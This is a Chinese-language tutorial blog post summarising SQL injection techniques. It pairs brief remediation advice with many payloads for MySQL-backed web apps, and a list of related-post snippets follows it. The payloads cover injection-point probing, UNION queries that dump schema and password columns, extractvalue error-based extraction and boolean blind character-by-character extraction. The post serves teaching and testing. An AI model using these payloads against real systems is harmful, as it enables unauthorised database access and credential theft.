2. 程式人生 > >SQL注入漏洞姿勢總結

SQL注入漏洞姿勢總結

阿新 發佈:2018-12-12

一、SQL注入漏洞介紹:

SQL注入攻擊包括通過輸入資料從客戶端插入或“注入”SQL查詢到應用程式。一個成功的SQL注入攻擊可以從資料庫中獲取敏感資料、修改資料庫資料(插入/更新/刪除)、執行資料庫管理操作(如關閉資料庫管理系統)、恢復存在於資料庫檔案系統中的指定檔案內容,在某些情況下能對作業系統釋出命令。SQL注入攻擊是一種注入攻擊。它將SQL命令注入到資料層輸入,從而影響執行預定義的SQL命令。由於使用者的輸入,也是SQL語句的一部分,所以攻擊者可以利用這部分可以控制的內容,注入自己定義的語句,改變SQL語句執行邏輯,讓資料庫執行任意自己需要的指令。通過控制部分SQL語句,攻擊者可以查詢資料庫中任何自己需要的資料,利用資料庫的一些特性,可以直接獲取資料庫伺服器的系統許可權。

二、修復建議

  1. 使用引數化查詢介面或在程式碼級對帶入SQL語句中的外部引數進行轉義或過濾;
  2. 對於整數,判斷變數是否符合[0-9]的值;其他限定值,也可以進行合法性校驗;
  3. 對於字串,對SQL語句特殊字元進行轉義(單引號轉成兩個單引號,雙引號轉成兩個雙引號)。

三、各類姿勢

3.1 通過以下操作先大概判斷是否存在注入點

  1. 如果引數(id)是數字,測試id=2-1與id=1返回的結果是否相同,如果做了2-1=1的運算,說明可能存在數字型注入。如果要用+號運算的話,因為URL編碼的問題,需要把加好換成%2B,如id=1%2B1
  2. 在引數後面加單引號或雙引號,判斷返回結果是否有報錯
  3. 添加註釋符,判斷前後是否有報錯,如id=1' --+ 或 id=1" --+ 或id=1' # 或id=1" --+  (--後面跟+號,是把+當成空格使用)
  4. 有些引數可能在括號裡面,如:SELECT first_name, last_name FROM users WHERE user_id = ('$id');所以也可以在引數後面加單雙引號和括號,如id=1')  --+ 或 id=1") --+ 或id=1') # 或id=1") --+ 
  5. 引數後面跟or 或者and,判斷返回結果是否有變化,如1' or 'a'='a  或者and 'a'='a或者1' or 'a'='b或者1' or '1'='2
  6.   如果返回的正確頁面與錯誤頁面都一樣,可以考慮時間延遲的方法判斷是否存在注入,如  1’ and sleep(5)

3.2 如果存在注入,利用注入獲取資訊

3.2.1 查詢結果如果可以直接返回

利用聯合查詢一步步的獲取資訊,如:

1' union select schema_name ,1 from information_schema.schemata --   // 獲取資料庫名稱,注意聯合查詢的列數和資料型別

1' union  select table_name from information_schema.tables where table_schema='database_name'  //根據上一步獲取的資料庫名稱,獲取表名

1' union  select column_name from information_schema.columns where table_schema='database_name' and table_name='table_name'  //根據上面的資料庫名稱和表名獲取欄位名

1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 資料庫名.表名   //使用group_concat的目的是把查詢結果合併成1列,另外,注意如果不是在一個數據庫下面的話,跨資料庫查詢,需要使用資料庫名.表明的格式,比如information_schema.schemata

3.2.2 通過報錯回顯查詢結果,如

and extractvalue(1,concat(0x7e,(select database())))  #直接回顯查詢到的值,回顯當前的資料庫名

and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' )))  #直接回顯查詢到的值,回顯表名

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns  where table_schema='security'  and table_name='users')))   #直接回顯查詢到的值,回顯列名稱

3.2.3 布林型注入

SELECT * FROM users where id ='1' and LENGTH(database())=8     #判斷資料庫名的長度是多少

SELECT * FROM users where id ='1' and ascii(substr((select database()),1,1))>115   # 二分查詢發挨個判斷資料庫名稱的每個字母

SELECT * FROM users where id ='1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116  #挨個判斷此資料庫中表的每個字母

相關推薦

SQL注入漏洞姿勢總結

一、SQL注入漏洞介紹: SQL注入攻擊包括通過輸入資料從客戶端插入或“注入”SQL查詢到應用程式。一個成功的SQL注入攻擊可以從資料庫中獲取敏感資料、修改資料庫資料(插入/更新/刪除)、執行資料庫管理操作(如關閉資料庫管理系統)、恢復存在於資料庫檔案系統中的指定檔案內容,在某些情況下能對作業系統釋出命令。S

ThinkPHP 5.1.x SQL注入漏洞分析

一、背景引見 ThinkPHP 是一個疾速、複雜的基於 MVC 和麵向物件的輕量級 PHP 開發框架,遵照 Apache2 開源協議釋出。ThinkPHP從降生以來不斷秉承簡潔適用的設計準繩,在堅持出色的功能和至簡的程式碼的同時,也注重開發體驗和易用性,為 WEB 使用和 API 開發提供了強無

SQL注入漏洞筆記

一:注入原理 SQL注入是一種常見的Web安全漏洞,攻擊者利用這個問題,可以訪問或修改資料,或者利用潛在的資料庫漏洞進行攻擊 SQL注入是一種將SQL語句插入或天機到應用(使用者)的輸入引數中的攻擊,之後再將這些引數傳遞給後臺的SQL伺服器加以解析並執行 常見的web架構 表示層 :訪問網址

PHP程式碼審計-SQL注入漏洞挖掘

SQL注入經常出現在登入頁面,HTTP頭(user-agent/client-ip/cookies等),訂單處理等地方,在發生多個互動的地方經常會發生二次注入。 普通注入 $uid = $_GET[‘id’]; $sql = “select * from user where id=$

PHP SQL注入漏洞防範

在PHP中採用魔術引號進行過濾,但是PHP5.4之後被取消了,同時在遇到int型注入也不會那麼有效,所以用的最多的還是過濾函式和類(例如discuz,dedecms,phpcms),如果單純的過濾函式寫的不嚴謹,就會出現繞過的情況,最好的解決方法還是預編譯的方式。 GPC/runtime魔術

怎麼修復網站漏洞之metinfo遠端SQL注入漏洞修補

2018年11月23日SINE網站安全檢測平臺,檢測到MetInfo最新版本爆出高危漏洞,危害性較大,影響目前MetInfo 5.3版本到最新的 MetInfo 6.1.3版本,該網站漏洞產生的主要原因是MetInfo的上傳程式碼裡的引數值沒有進行安全過濾,導致上傳路徑這裡進行偽造路徑,並可以插入惡意的程式碼

CNVD-2018-20024——MetInfo 6.1.2 SQL注入漏洞

0x00漏洞簡介 metinfo是一個cms 6.1.2版本中存在一個sql盲注漏洞 0x01漏洞細節與漏洞利用 在\app\system\message\web\message.class.php的add函式。 get_one這裡有個columnid 這個地方是傳入int型別

思科修復Prime License Manager中的關鍵SQL注入漏洞

思科剛剛修補了一個關鍵的SQL注入漏洞,該漏洞存在於Cisco Prime License Manager(PLM)的Web框架程式碼中,旨在幫助管理員在企業範圍內管理使用者許可。 在成功利用CVE-2018-15441安全問題之後,潛在的遠端攻擊者可以在脆弱的機器上執行任意SQL查詢。 根據思科在Cis

【程式碼審計】五指CMS_v4.1.0 copyfrom.php 頁面存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

【程式碼審計】五指CMS_v4.1.0 後臺存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

【程式碼審計】大米CMS_V5.5.3 SQL注入漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

【程式碼審計】XIAOCMS_後臺database.php頁面存在SQL注入漏洞

  0x00 環境準備 XIAOCMS官網: http://www.xiaocms.com/ 網站原始碼版本:XiaoCms (釋出時間:2014-12-29) 程式原始碼下載:http://www.xiaocms.com/download/XiaoCms_20141229.zip 測試網

sqlmap查詢SQL注入漏洞入門

sqlmap查詢SQL注入漏洞入門 1、安裝sqlmap sqlmap是一款非常強大的開源sql自動化注入工具,可以用來檢測和利用sql注入漏洞。注意:sqlmap只是用來檢測和利用sql注入點的,使用前請先使用掃描工具掃出sql注入點。 它由python語言開發而成,因此執行需要安

ecshop 全系列版本網站漏洞 遠端程式碼執行sql注入漏洞

ecshop漏洞於2018年9月12日被某安全組織披露爆出,該漏洞受影響範圍較廣,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影響,主要漏洞是利用遠端程式碼執行sql注入語句漏洞,導致可以插入sql查詢程式碼以及寫入程式碼到網站伺

discuzX3.2 X3.4網站漏洞修復 SQL注入漏洞修復

2018年12月9日,國內某安全組織,對discuz X3.2 X3.4版本的漏洞進行了公開,這次漏洞影響範圍較大,具體漏洞是discuz 的使用者前段SQL注入與請求偽造漏洞,也俗稱×××F漏洞,漏洞產生的原因首先:php環境的版本大約PHP5.2,dizcuzX3.2 X3.4版本,伺服器環境是windo

張小白的滲透之路(二)——SQL注入漏洞原理詳解

SQL注入漏洞簡介 亂七八糟的就不多說了,自己百度去 SQL注入原理 想要更好的學習SQL注入,那麼我們就必須要深入的瞭解每種資料庫的SQL語法及特性。下面通過一個經典的萬能密碼的例子帶大家來撥開一下SQL注入漏洞的神祕面紗。本次環境為:DVWA的第一關(DVW

SQL注入使用詳細總結(由淺及深,持續更新中)

版權宣告:本文為博主原創文章,歡迎轉載,請註明出處: https://me.csdn.net/qq_41880069 SQL注入使用總結 一:SQL注入的原理 1:什麼是SQL SQL,指結構化查詢語言,作用:訪問和處理資料庫 也就是說SQL語言的所有操作都是

SQL注入漏洞測試(引數加密)

1)從網站資訊洩露,推測有網頁可以探測,使用御劍珍藏版-small掃描 掃描得到   http://219.153.49.228:48291/news/list.zip 解壓得到原始碼 從第五行 方法可得知 AES的資料塊長度為128位,金鑰為ydhaqPQnexoa

利用SQL注入漏洞登入後臺

所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的SQL命令,比如先前的很多影視網站洩露VIP會員密碼大多就是通過WEB表單遞交查詢字元暴出的,這類表單特別容易受到SQL注入式攻擊. sql注入 什麼時候最

Web漏洞處理--http host頭攻擊漏洞處理方案/檢測到目標URL存在寬位元組跨站漏洞/ 檢測到目標URL存在SQL注入漏洞

1.配置web 攔截器 <filter> <filter-name>XssSqlFilter</filter-name> <filter-class>com.enation.eop.Se